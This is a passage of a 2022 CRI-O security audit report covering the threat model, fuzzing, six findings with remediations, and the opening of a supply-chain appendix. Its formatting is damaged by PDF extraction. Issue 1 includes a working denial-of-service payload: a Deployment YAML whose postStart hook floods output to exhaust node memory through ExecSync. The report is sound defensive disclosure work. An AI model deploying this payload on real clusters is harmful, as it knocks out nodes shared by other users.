The CVE for the\ncorresponding Containerd issue is\nCVE-2022-31030.\nThe Github security advisories for the denial of service attacks are:\n●\nCRI-O:\nhttps://github.com/cri-o/cri-o/security/advisories/GHSA-fcm2-6c3h-pg6j\n●\nContainerd:\nhttps://github.com/containerd/containerd/security/advisories/GHSA-5ffw-gxpp-\nmxpf\nIn the remainder of this report we will iterate through each of the tasks in more detail, and\nthe findings are listed at the end of the report.\nThe work in this report (excluding appendix) was done by Ada Logics over the duration of 25\nworking days.\n2\nCRI-O security audit, 2022\nTable of Contents\nExecutive summary\n2\nThreat model formalisation\n5\nCRI-O architecture & components\n5\nCrio binary\n5\nConmon\n6\nPinns\n6\nRuntime service\n6\nContainers/image and containers/storage\n6\nContainer Network Interface\n6\nCRI-O attack surface enumeration\n7\nCRI-O gRPC server\n7\nConmon\n7\nPinns\n7\nRuntime service\n8\nContainers/image and containers/storage\n8\nContainer Network Interface\n8\nCode audit\n9\nFuzzing integration\n11\nTesting and documentation\n13\nIssues found\n14\nIssue 1: High: Cluster DOS by way of memory exhaustion\n15\nIssue 2: Medium: Temporary exhaustion of disk resources on a given node\n1\n8\nIssue 3: Low: Use of deprecated library io/ioutil\n1\n9\nIssue 4: Low: Timeouts in container creation routines due to device specifications\n20\nIssue 5: Low: Unhandled errors from deferred file close operations\n21\nIssue 6: Informational: Missing nil-pointer checks in json unmarshalling\n2\n2\nAppendix:\nSoftware Supply Chain Security Audit CRI-O\n2\n3\nTable Of Contents\n2\n5\nEngagement Overview\n2\n6\nChainguard Company Overview\n2\n6\nExecutive Summary\n2\n6\nSoftware Supply Chain Security Background\n2\n6\nGoals\n2\n8\nInterviews & Engagement Model\n2\n8\nFindings\n2\n8\nBuild\n2\n8\nSource Code\n2\n8\nDeploy\n2\n9\nMaterial Verification\n2\n9\nSLSA Overview\n29\n3\nCRI-O security audit, 2022\nSLSA Findings\n2\n9\nSLSA Assessment Table\n2\n9\nRecommendations and Remediations\n3\n2\nDocument the Release Process, Draft Policy\n3\n3\nSystem Generated Provenance and SBOM\n3\n3\nPush towards SLSA compliance, all the way to Level 3\n3\n3\nAutomate Package Builds\n3\n4\nSources\n3\n5\n4\nCRI-O security audit, 2022\nThreat model formalisation\nIn this section we outline the threat modelling of CRI-O. The goal of this effort was to\nconstruct an understanding of CRI-O in order to outline a suitable attack surface which can\nbe used throughout the engagement. The goal is to both construct a model that is both\nuseful for manual auditing as well as fuzzer creation. To do this, we extract the logical\ncomponents of CRI-O and identify the potential application security issues that may exist.\nCRI-O architecture & components\nThe architecture diagram of CRI-O provides a convenient way to identify these. In the\nfollowing we go through each of the components to highlight their importance and security\nrelevance.\nDiagram from\nhttps://cri-o.io\nCrio binary\nThe central component of the CRI-O architecture is the crio binary itself. This application is\nin charge of facilitating communication between kubelet and the rest of the components that\nCRI-O uses, such as container runtimes and container registries. The crio binary runs by\nway of a gRPC server which implements the\nKubernetes\nContainer Runtime Interface\n.\nThe execution environment of the crio binary is particularly relevant to the security analysis\nof CRI-O. 
In particular, crio is always meant to:\n1.\nOnly communicate with the Kubelet, despite it in theory being able to work as a\ngRPC server independently of Kubelet.\n2.\nRun as a systemd daemon.\n5\nCRI-O security audit, 2022\nThe importance of the crio binary only communicating with the Kubelet is important because\nthe Kubelet handles a lot of the sanitization of user input before it reaches CRI-O.\nFurthermore, much of the input that reaches CRI-O is auto-generated by Kubelet and follows\na certain set of restrictions. This is important for the threat model of CRI-O because many\nsecurity issues will arise in the event that the gRPC server runs independently of Kubelet.\nThe fact that the gRPC server runs by way of the Kubelet makes it more complicated to\nassess the complete security posture of CRI-O. This is because in order to understand the\npotential input space CRI-O has it is necessary to navigate through the Kubelet, and the\nKubelet will perform various sanitizations as well as generate data that is passed on to\nCRI-O.\nFor the above reasons, it’s imperative to stress: CRI-O is only meant to be run by way of the\nKubelet and if this is not satisfied then there are no guarantees from CRI-O about being\nsecure.\nThe crio binary itself handles a lot of communication and managing of the other components\ninvolved in the CRI-O ecosystem. We will now iterate through several of the important ones.\nConmon\nIs a small utility application working as a monitoring and communication tool between CRI-O\nand OCI runtimes, e.g. runc in the CRI-O case. A Conmon process is launched for each\ncontainer started by the crio binary.\nPinns\nThe Pinns utility is a small program that lives in the CRI-O repository\nhere\nand is used to set\nkernel parameters at runtime. Notably, this utility was a core part of the container escape in\nCVE-2022-0811\n. The problem that occurred was from\na high-level perspective that the Pinns\nutility could be used to set arbitrary kernel parameters, whereas CRI-O aims to only allow\nsetting a few selected and pre-determined kernel parameters.\nRuntime service\nCRI-O implements the Kubernetes Container Runtime Interface with focus on using runtimes\ncompatible with the\nOpen Container Initiative Runtime\nSpecification\n. The runtime service\ncomponent in the CRI-O architecture is thus runtimes that implement this specification, such\nas\nrunc\n.\nContainers/image and containers/storage\nThe\ncontainers/image\nand\ncontainers/storage\nprojects\nare used by CRI-O to pull images\nfrom container registries as well as storing the file systems on disk, respectively.\nContainer Network Interface\nCRI-O uses the\nContainer Network Interface\nto configure\nnetwork interfaces for its pods.\n6\nCRI-O security audit, 2022\nCRI-O attack surface enumeration\nIn this section we outline the attack surface enumeration. The goal is first and foremost to\noutline relevant areas of potential attacks to be analysed throughout this engagement. In this\ncontext, we focus on identifying an attack surface that we can assess in line with the scope\nof the audit.\nThe focus of the attack surface enumeration is to highlight where breaking of trust\nrelationships in CRI-O may be possible and also areas of potential vulnerabilities in the\ncomponents outlined above.\nThe focus of our attack surface enumeration is also to identify the scope of the security in\nCRI-O.\nCRI-O gRPC server\nA central part of the attack surface of CRI-O is the gRPC server itself. 
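To make the shape of this interface concrete, the kind of request the gRPC server accepts can be sketched with a minimal CRI client (illustrative only: in a real deployment this traffic is generated by the Kubelet, and the socket path, container ID and exact library usage below are assumptions on our part rather than code from CRI-O):

```go
package main

import (
	\"context\"
	\"fmt\"
	\"time\"

	\"google.golang.org/grpc\"
	\"google.golang.org/grpc/credentials/insecure\"
	runtimeapi \"k8s.io/cri-api/pkg/apis/runtime/v1\"
)

func main() {
	// crio listens on a local unix socket; only the Kubelet is expected to
	// connect to it (assumed default socket path).
	conn, err := grpc.Dial(\"unix:///var/run/crio/crio.sock\",
		grpc.WithTransportCredentials(insecure.NewCredentials()))
	if err != nil {
		panic(err)
	}
	defer conn.Close()

	client := runtimeapi.NewRuntimeServiceClient(conn)
	ctx, cancel := context.WithTimeout(context.Background(), 10*time.Second)
	defer cancel()

	// ExecSync is one of the CRI handlers audited in this report; the
	// container ID is a placeholder.
	resp, err := client.ExecSync(ctx, &runtimeapi.ExecSyncRequest{
		ContainerId: \"some-container-id\",
		Cmd:         []string{\"echo\", \"hello\"},
		Timeout:     5,
	})
	if err != nil {
		panic(err)
	}
	fmt.Printf(\"stdout: %q\", resp.Stdout)
}
```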
The gRPC server\nitself accepts input from the Kubelet and a lot of security measures are handled by\nKubernetes before passing the data over to the gRPC server.\nDue to the relationship between Kubernetes and the CRI, the important part for the gRPC\nserver is that each of the gRPC handlers will only perform the operations expected by the\ngRPC handler and only those. There should be no unintended side-effects.\nThe gRPC server runs as a daemon on each Kubernetes node. This means a key threat to\nCRI-O is if the gRPC server can be used to perform unintended behaviour on the node\nwhich can be used for malicious purposes.\nThe gRPC server doesndles a lot of handling of other components on the node, e.g.\nConmon, OCI runtime and Pinns. The communication and management of these\ncomponents is an area of attack surface, e.g. command injections or passing of malicious\ndata to the other components.\nConmon\nA conmon process is launched for each container on the node managed by CRI-O. Conmon\nis thus a ubiquitous part of the system. Conmon is written in C and susceptible to memory\ncorruption attacks. User input originating from the gRPC server is passed to Conmon and\ninput from the container’s are also handled in Conmon. These are areas of potential attack\nsurface against Conmon.\nPinns\nThe central attack surface to the Pinns utility is whether it can be abused to set undesired\nkernel runtime parameters. This is the style that the recent attack leveraged in\nCVE-2022-0811\n. In addition to this, Pinns is written\nin C which means it is susceptible to\nmemory corruption issues.\n7\nCRI-O security audit, 2022\nRuntime service\nThe runtime service plays a big role in CRI-O. The attack surface of the runtime\nimplementations themselves is out of scope of CRI-O. However, the communication\nchannels and configuration between CRI-O and the runtime implementations is an area of\nattack surface.\nContainers/image and containers/storage\nThe\ncontainers/image\nand\ncontainers/storage\nlibraries\nare used to handle container images.\nEach of these projects should be treated as potential areas of issues, such as mishandling of\ndata that can affect CRI-O.\nThe containers/image\nrelies on dependencies with substantial\ncomplexity\nthat are written in\nmemory unsafe languages, e.g. OSTree. In this sense, although CRI-O is mainly written in\nthe Go programming language it has close dependencies that are written in memory unsafe\nlanguages.\nThe communication between the container registries and CRI-O is also an area of attack\nsurface. The network communication needs to be done in a secure manner.\nContainer Network Interface\nThe Container Network Interface\nis used by CRI-O to\nconfigure container networking. The\nattack surface of the CNI itself is out of the scope of CRI-O. However, the communication\nchannels and configuration between CRI-O and the CNI is an area of attack surface.\n8\nCRI-O security audit, 2022\nCode audit\nIn this section we outline the main efforts in manually auditing CRI-O and, specifically, we\ndetail how we enumerated the attack surface defined above.\nAuditing of gRPC entrypoints.\nA thorough auditing of the gRPC handlers were undertaken in an effort to both understand\nthe CRI-O daemon in detail as well as outline any potential areas for flaws. 
This is the main entrypoint for communication from CRI-O's perspective and is thus where the majority of the auditing efforts were dedicated.\nThe first step was to audit the code from the entrypoints of the gRPC handlers and follow the possible code paths. At first the effort during the auditing was made to understand the details of the code, and then further reviews of the code were performed to assess security issues.\nDuring this auditing we focused on mishandling of untrusted input:\n●\nCommand injections for all code paths where crio ends up in exec calls. This includes calls to e.g. conmon and r.path (often runc). The arguments were traced to the origins in the gRPC messages.\nIn general, this found no possibilities for command injection due to the use of proper command execution handling. However, we found that in general there was a lack of sanitization on user input, though none of it had any security implications at this moment in time.\n●\nImproper file handling. We focused on cases of malevolent file operations such as path traversals and read/write of files in undesired ways.\n●\nManipulation of logging messages and whether user-controlled data can affect the integrity of logs or cause non-repudiation issues. We found that there was a lack of sanitization on the user input to the logs, which means that in certain circumstances the gRPC server's logs can be tainted if the unsanitized variables include a newline character. However, this was deemed to have no security implications because:\n○\nThe arguments that were unsanitised were created by Kubernetes.\n○\nThe gRPC server is meant to run as a daemon and journalctl escapes the newline characters.\nWe still recommend that the CRI-O maintainers log data strings from input to CRI-O by using the “%q” format string rather than “%s”. Sometimes in the code this is done interchangeably for the same variable, such as for req.ContainerId here:\nlog.Infof(ctx, \"Starting container: %s\", req.ContainerId)\nc, err := s.GetContainerFromShortID(req.ContainerId)\nif err != nil {\n    return status.Errorf(codes.NotFound, \"could not find container %q: %v\", req.ContainerId, err)\n}\nWe recommend sticking with “%q”.\nThe second step was to perform a bottom-up approach of vulnerable primitives in the gRPC server. The methodology of this effort was by starting from possible vulnerability primitives and from a bottom-up effort to determine if a potential vulnerable primitive was in fact
Libostree is a complex application written in the C\nlanguage, and, because of that, we made the decision early in the process to integrate\nlibostree into OSS-Fuzz in this\nPR\n. However, in collaboration\nwith the CRI-O maintainers it\nwas later determined OSTree is not an important dependency since CRI-O does not rely\nexplicitly on OSTree, and, therefore, we focused our efforts elsewhere.\nPinns utility auditing\nThe pinns utility was audited for memory corruption issues and mishandling of user input.\nWe also assessed the possibility of configuring undesired kernel parameters by way of/proc/sys\nvirtual filesystem, and the options for\nwhat is set in Pinns is also guarded in the\ngRPC server with the guards in\npkg/config/sysctl.go\nApplying CodeQL and gosec tools on gRPC server\nFinally, we ran two automated security analysis tools against the CRI-O code, specifically\nCodeQL (\nhttps://lgtm.com/\n) and Gosec (\nhttps://github.com/securego/gosec\n).\nWe assessed\nthe reports and validated the findings of them in terms of security relevance.\nIntegrating CodeQL and Scorecards to the CI\nAs part of our efforts here we integrated CodeQL and\nScorecard\nGithub actions. These are\nnow run on each PR made to CRI-O.\nAlthough we found none of the issues reported as being exploitable, CodeQL did report a\nhandful of coding issues. These have been addressed\nhere\n.\n10\nCRI-O security audit, 2022\nFuzzing integration\nIn this section we outline the fuzzing work of CRI-O. The main goal of fuzzing CRI-O was to\nset up continuous fuzzing by way of OSS-Fuzz that achieves a high level of code coverage.\nThe main challenge of this task was to set up infrastructure to make fuzzing of CRI-O work.\nCRI-O relies on many components and binaries existing on the system, as well uses a fairly\ncomplex testing framework, e.g. many mocks.\nIn summary, we implemented 14 fuzzers targeting the CRI-O code, as well as\ncontainers/image and containers/store, and integrated the project into\nOSS-Fuzz\n. The\nfuzzers are available at\nhttps://github.com/cncf/cncf-fuzzing/tree/main/projects/cri-o\nand the\nOSS-Fuzz integration is available at\nhttps://github.com/google/oss-fuzz/tree/master/projects/cri-o\n.\nThe primary focus of the fuzzing was to target the gRPC handlers. This is mainly done by\nfuzz_server\nwhich is a fairly large fuzzer consisting\nof 900 lines of code. This fuzzer initiates\na gRPC server and sends sequences of random messages to the server. In this way, the\nfuzzer has a significant reach throughout the code of CRI-O. However, it’s important to note\nhere that the fuzzer is an over-approximation of the values that are actually possible to have\nin CRI-O, in that the fuzzer generates arbitrary data that is not sanitised by all the Kubelet\nlogic, i.e. much of the data send will not be possible to receive through Kubelet. 
The fuzzer,\nregardless, found an interesting issue (issue 4 in this report).\nThe following table provides source code to all of the fuzzers developed.\nFuzzer\nSource code\nfuzz_server\nhttps://github.com/cncf/cncf-fuzzing/blob/main/projects/cri-o \n/fuzz_server.go\nfuzz_container_server\nhttps://github.com/cncf/cncf-fuzzing/blob/main/projects/cri-o \n/container_server_fuzzer.go\nfuzz_copy_image\nhttps://github.com/cncf/cncf-fuzzing/blob/main/projects/cri-o \n/storage_fuzzer2.go\nfuzz_container\nhttps://github.com/cncf/cncf-fuzzing/blob/main/projects/cri-o \n/container_fuzzer.go\nfuzz_apparmor\nhttps://github.com/cncf/cncf-fuzzing/blob/main/projects/cri-o \n/config_apparmor_fuzzer.go\nfuzz_blockio\nhttps://github.com/cncf/cncf-fuzzing/blob/main/projects/cri-o \n/config_blockio_fuzzer.go\nfuzz_config\nhttps://github.com/cncf/cncf-fuzzing/blob/main/projects/cri-o \n/config_fuzzer.go\nfuzz_generate_passwd\nhttps://github.com/cncf/cncf-fuzzing/blob/main/projects/cri-o\n11\nCRI-O security audit, 2022\n/utils_fuzzer.go\nfuzz_get_decryption_keys\nhttps://github.com/cncf/cncf-fuzzing/blob/main/projects/cri-o \n/server_fuzzer2.go\nfuzz_idtools_parse_id_map\nhttps://github.com/cncf/cncf-fuzzing/blob/main/projects/cri-o \n/server_fuzzer2.go\nfuzz_parse_image_name\nhttps://github.com/cncf/cncf-fuzzing/blob/main/projects/cri-o \n/storage_fuzzer.go\nfuzz_parse_store_reference\nhttps://github.com/cncf/cncf-fuzzing/blob/main/projects/cri-o \n/ParseStoreReference_fuzzer.go\nfuzz_rdt\nhttps://github.com/cncf/cncf-fuzzing/blob/main/projects/cri-o \n/config_rdt_fuzzer.go\nfuzz_shortnames_resolve\nhttps://github.com/cncf/cncf-fuzzing/blob/main/projects/cri-o \n/storage_fuzzer.go\n12\nCRI-O security audit, 2022\nTesting and documentation\nAn area of interest from the CRI-O maintainers was our view on the testing and\ndocumentation of CRI-O.\nIn short, we found the testing of CRI-O to be extensive and of high quality. The testing of the\ngRPC server is extensive, but we found no unit testing of the Pinns utility. Pinns is a small\ncomponent of CRI-O and this may be the reason why there is no unit testing. One\nrecommendation we have in this context is to include more thorough unit tests for Pinns, in\nparticular to also detect regressions that may be related to\nCVE-2022-0811\n.\nWe found the documentation of CRI-O and its internals to be very limited and almost\nnon-existing. This was problematic from a perspective of getting to understand the code in\ndetail. A lot of this engagement was spent in walking through the code to extract a thorough\nunderstanding, and this could be improved with more technical documentation.\nIn the context of documentation, theman\npages and\nthe tutorials in\n/tutorials\nwere of\nsignificant help, as well as the (limited) documentation on\nhttps://cri-o.io\n.\nDue to the nature of CRI-O’s security model it’s imperative to be able to assess CRI-O (and\ncustom versions of it) by way of Kubernetes. Our approach to this ended up being using\nCRI-O in Minikube and transferring custom crio binaries into the Minikube cluster from our\nlocalhost. In this way we could attack CRI-O from a Kubernetes user’s perspective while\ndebugging CRI-O with custom modifications. In the context for future security work it would\nbe of great benefit to have tutorials or guides on how to deploy custom CRI-O binaries (or at\nleast the gRPC server) onto a cluster, and perhaps for multiple common Kubernetes testing\nenvironments (i.e. 
not limited to\ntutorials/Kubernetes.md\n).\n13\nCRI-O security audit, 2022\nIssues found\nIn this section we outline and detail the issues found in CRI-O. The following table\nsummarises the issues found and in the remaining parts of the report we go into detail with\neach of the issues.\nIssue number\nTitle\nSeverity\nDifficulty\nADA-CRIO-22-01\nCluster DOS by way of memory exhaustion\nHigh\nLow\nADA-CRIO-22-02\nTemporary exhaustion of disk resources on \na given node\nMedium\nLow\nADA-CRIO-22-03\nUse of deprecated library io/ioutil\nLow\nHigh\nADA-CRIO-22-04\nTimeouts in container creation routines due \nto device specifications\nLow\nHigh\nADA-CRIO-22-05\nUnhandled errors from deferred file close \noperations\nLow\nHigh\nADA-CRIO-22-06\nMissing nil-pointer checks in json \nunmarshalling\nInformational\nHigh\n14\nCRI-O security audit, 2022\nIssue 1: High: Cluster DOS by way of memory exhaustion\nSeverity\nHigh\nDifficulty\nLow\nTargetExecSync\ngRPC handler andinternal/oci/runtime_oci.go\nFinding ID\nADA-CRIO-22-01\nFound by\nManual auditing\nTheExecSync\nrequest runs commands in a container\nand logs the output of the command.\nThis output is then read by CRI-O after command execution, and it is read in a manner\nwhere the entire file corresponding to the output of the command is read in. Thus, if the\noutput of the command is large it is possible to exhaust the memory of the node when crio\nreads output of the command.\nA similar, although manifested by way of different underlying code, also exists in Containerd\nand the exact same attack as outlined here can be used on Containerd.\nThe CVE for this vulnerability is\nCVE-2022-1708 for\nCRI-O and\nCVE-2022-31030 for\nContainerd,\nand the Github security advisories for\nthis issue are:\n●\nCRI-O:\nhttps://github.com/cri-o/cri-o/security/advisories/GHSA-fcm2-6c3h-pg6j\n●\nContainerd:\nhttps://github.com/containerd/containerd/security/advisories/GHSA-5ffw-gxpp-\nmxpf\nThe specific code that loads the logged output is\nhere\n:\n//XXX:Currently runC dups the same console overboth stdout andstderr,// so we can't differentiate between the two.logBytes, err := ioutil.ReadFile(logPath)iferr !=nil{returnnil, &ExecSyncError{Stdout: stdoutBuf,Stderr: stderrBuf,ExitCode:-1,Err: err,}}\nThe following deployment is an example yaml file that will log many gigabytes of ‘A’\ncharacters, which will be read by the above lines. 
Depending on the machine this will\nexhaust the memory available.\n15\nCRI-O security audit, 2022\napiVersion:apps/v1kind:Deploymentmetadata:name:nginx-deployment100spec:selector:matchLabels:app:nginxreplicas:2template:metadata:labels:app:nginxspec:containers:-name:nginximage: nginx:1.14.2ports:-containerPort:80lifecycle:postStart:exec:command:[\"/bin/sh\",\"-c\",\"for i in `seq1 5000000`; doecho -n'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n16\nCRI-O security audit, 2022\nAAAAAAAAAAAAAAAAAAA'; done\"]preStop:exec:command:[\"/bin/sh\",\"-c\",\"echoBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB\"]\nSeverity\nis high since anyone who can create pods\non the cluster can exhaust the memory\non the nodes of the cluster.\nDifficulty\nis low because the vulnerability is easy\nto exploit. However, in order to create\ndeployments on the cluster a user is required to have already gained some privileges.\nRemediation:\nThe solution to this problem involved a patch to CRI-O that limited the number of bytes that\nwere read from logFile written by conmon. Since\nthe\ndockershim\npreviously set a limit of 16\nMB for this buffer, the same size was adopted by CRI-O.\n17\nCRI-O security audit, 2022\nIssue 2: Medium: Temporary exhaustion of disk resources on a given\nnode\nSeverity\nMedium\nDifficulty\nLow\nTargetExecSync\ngRPC handler andinternal/oci/runtime_oci.go\nFinding ID\nADA-CRIO-22-02\nFound by\nManual auditing\nTheExecSync\nrequest runs commands in a container\nand logs the output of the command.\nThus, if the output of the command is large it is possible to exhaust the storage of the node\nas all output is stored on disk.\nThis is orthogonal to issue 1, but is a separate issue that should also be considered.\nKubernetes allows users to specify storage limitations to pods, and it is possible by users to\nbypass this, at least in the sense of taking up more storage than asked for, in a temporary\nmanner by way of logging.\nRemediation:\nFor this vulnerability, the fix lies in conmon, since conmon is the entity writing the exec log to\ndisk. 
Conmon will introduce the `--log-global-size-max` option, which counts the number of\nbytes that have been written for this container, and ignores bytes written after the limit is\nreached. CRI-O has been patched to check for this capability in conmon, and sets the limit to\n16MB automatically if conmon supports it.\n18\nCRI-O security audit, 2022\nIssue 3: Low: Use of deprecated library io/ioutil\nSeverity\nLow\nDifficulty\nHigh\nTarget\nMany places in code base\nFinding ID\nADA-CRIO-22-03\nFound by\nManual auditing\nThe library io/ioutil is used throughout the codebase. This library is deprecated since go1.16\nhttps://go.dev/doc/go1.16#ioutil\nThe deprecation was not due to security issues and as such it does not pose any immediate\nrisk. However, the use of deprecated libraries is discouraged and can lead to situations\nwhere security issues in a library are found but never patched.\nIssue 1 is due to the use of a dangerous function,ReadFile\n, in this library.\n19\nCRI-O security audit, 2022\nIssue 4: Low: Timeouts in container creation routines due to device\nspecifications\nSeverity\nLow\nDifficulty\nHigh\nTargetinternal/factory/container/device.go\nFinding ID\nADA-CRIO-22-04\nFound by\nFuzzing\nThe following issue:\nhttps://bugs.chromium.org/p/oss-fuzz/issues/detail?id=47159\nis a\ntimeout inSpecAddDevices\ntriggered by the\ncontainer_fuzzer.go\nfuzzer. The issue is\ntriggered by a call to\nSpecAddDevices\nfunction call\nand the issue happens because the\nconfiguration ends up having set a number of devices in the container config that will each\ntrigger\nthis line\nwith path set to “/”. In this case\nthis means there will be several directory\nwalks of the entire file system, and this causes the timeout.\nfor_, device :=rangec.Config().Devices {// pin the device to avoid using `device` withinthe range scope as......// if the device is not a device node// try to see if it's a directory holding many devicesiferr == devices.ErrNotADevice {// check if it is a directoryife := utils.IsDirectory(path); e ==nil{// mount the internal devices recursively// nolint: errcheckfilepath.Walk(path,func(dpathstring, f os.FileInfo,e error)error{// filepath.Walk failed, skipife !=nil{returnnil\nThe issue happens when a specific config is set by way ofcontainer.SetConfig\n.\nThis function is, however, set in theCreateContainer\nentrypoint of the server here\nhttps://github.com/cri-o/cri-o/blob/c17baa0dd7701bfd9bed58cb24aef39c1c125cc0/server/co\nntainer_create.go#L289\nand the requests have not been\nsanitised before callingSetConfig\n.\nRecommendation:\nIn general, we advise to have guards in place for this. Performance is of significance in\nCRI-O. Further discussion with the CRI-O team should be done.\n20\nCRI-O security audit, 2022\nIssue 5: Low: Unhandled errors from deferred file close operations\nSeverity\nLow\nDifficulty\nHigh\nTarget\nThroughout the code\nFinding ID\nADA-CRIO-22-05\nFound by\nManual auditing\nThroughout the codebase there are places where file close operations are deferred within a\nfunction where a file is being written to, e.g.\nhttps://github.com/cri-o/cri-o/blob/149cccaad772158d5908376aad3ee86e4e1ca4cf/internal/o\nci/runtime_oci.go#L1152\nhttps://github.com/cri-o/cri-o/blob/2aae9632876b0df4fba49e4229d7239a168a097c/cmd/crio/\nmain.go#L201\nThis can lead to undefined behaviour since any errors returned by thef.Close()\noperation\nare ignored. 
This can have consequences in the event a close operation fails and the data\nhas not yet been flushed to the file, which the rest of the code will assume it to be. For a\ndetailed discussion on this, please see\nhttps://www.joeshaw.org/dont-defer-close-on-writable-files/\nRecommendation\nEnsure that errors fromf.Close()\nare handled.\n21\nCRI-O security audit, 2022\nIssue 6: Informational: Missing nil-pointer checks in json unmarshalling\nSeverity\nInformational\nDifficulty\nHigh\nTargetinternal/oci/runtime_oci.go\nFinding ID\nADA-CRIO-22-06\nFound by\nManual auditing\nThere are several places in the code base where JSON decoding happens with a double\npointer as argument. There are scenarios where the JSON decoding will cause the double\npointer argument to be a nil-pointer and there are currently no checks in the code for this\ncase.\nAn example of this is in internal/oci/runtime_oci.go:\n// regardless of what is in waitErr// we should attempt to decode the output of the parent pipe// this allows us to catch TimedOutMessage, which will cause waitErr tonot be nilvarec *exitCodeInfodecodeErr := json.NewDecoder(parentPipe).Decode(&ec)\n…\n…NB: Called when there is no error in decoding:\nifec.ExitCode ==-1{returnnil, &ExecSyncError{Stdout: stdoutBuf,Stderr: stderrBuf,ExitCode:-1,Err: errors.New(ec.Message),}}\nThere are cases wheredecodeErr\nisnil\nandec\nends\nup also beingnil\n. This would cause\na nil-pointer dereference inec.ExitCode\n. The specific\nevent occurs when the output ofparentPipe\nequals “null”. Although we were not able\nto trigger this case, this exact coding\npattern has previously caused high-severity security vulnerabilities elsewhere:\nhttps://github.com/istio/istio/security/advisories/GHSA-856q-xv3c-7f2f\nRecommendation:\nCheck forec\nbeing a nil pointer before dereferencing\nit or avoid using a nil-pointer\ndereference.\n22\nCRI-O security audit, 2022\nSoftware Supply Chain Security Audit CRI-O\nIn collaboration with Open Source Technology \nImprovement Fund, Cloud Native Computing \nFoundation, and Ada Logics.\n23\nCRI-O security audit, 2022\nVersion\nAuthor\nNotes\n0.0.1\nAdolfo García V eytia\nInitial Draft\n24\nCRI-O security audit, 2022\nTable Of Contents\nEngagement Overview\n2\n5\nChainguard Company Overview\n2\n5\nExecutive Summary\n2\n5\nSoftware Supply Chain Security Background\n2\n5\nGoals\n2\n7\nInterviews & Engagement Model\n2\n7\nFindings\n2\n7\nBuild\n2\n7\nSource Code\n2\n7\nDeploy\n28\nMaterial Verification\n28\nSLSA Overview\n28\nSLSA Findings\n28\nSLSA Assessment Table\n28\nRecommendations and Remediations\n3\n1\nDocument the Release Process, Draft Policy\n3\n1\nSystem Generated Provenance and SBOM\n3\n2\nPush towards SLSA compliance, all the way to Level 3\n3\n2\nAutomate Package Builds\n3\n3\nSources\n3\n4\n25\nCRI-O security audit, 2022\nEngagement Overview\nAs part of the Cloud Native Computing Foundation (CNCF) and Linux Foundation’s\ncommitment to industry best practices, a third-party security review of CRI-O was funded.\nOpen Source Technology Improvement Fund, Inc (OSTIF) facilitated the review and sourced\nAdaLogics and Chainguard. AdaLogics performed threat modeling, OSS Fuzz integration,\nand manual code review; while Chainguard performed a supply chain review. The following\nreport is the Supply Chain Review.\nChainguard Company Overview\nChainguard is the world's premiere software supply chain leader. Our mission is to make the\nsoftware supply chain secure by default. 
Our teams feature the brightest minds in the\nindustry with cross-cutting experience across containers, cloud computing, security, and all\nthings software supply chain. We have a strong commitment to building and scaling secure\nopen source technologies for the world.\nExecutive Summary\nThe release process that generates CRI-O’s public and testing artifacts has its core\nfunctionality automated end to end, enabling the project to shield it from threats induced by\nhuman omission and compromised operator’s systems. The GitHub Actions powered\nrelease process sets the project in a position to start making its outputs non-falsifiable and to\npush towards SLSA compliance, setting a roadmap to an increasingly hardened process.\nBefore pursuing SLSA compliance, automating system package generation should be\nprioritized. Running those builds in an automated environment should be the first priority of\nthe CRI-O team. Minor recommendations around documentation can be done in parallel to\nensure advancing towards SLSA compliant systems is done from a fully documented\nplatform.\nThe project is close to SLSA level 1 compliance. Adding provenance metadata to the build\nruns would cover most of the missing points, readying the project to start signing artifacts\nand attestations.\nSoftware Supply Chain Security Background\nThe software development lifecycle has become increasingly complex, and one way for\nsoftware companies to deal with that complexity is to rely more and more on Open Source\nSoftware development. This reliance has opened an attack vector for hackers to infiltrate\norganizations and steal crucial 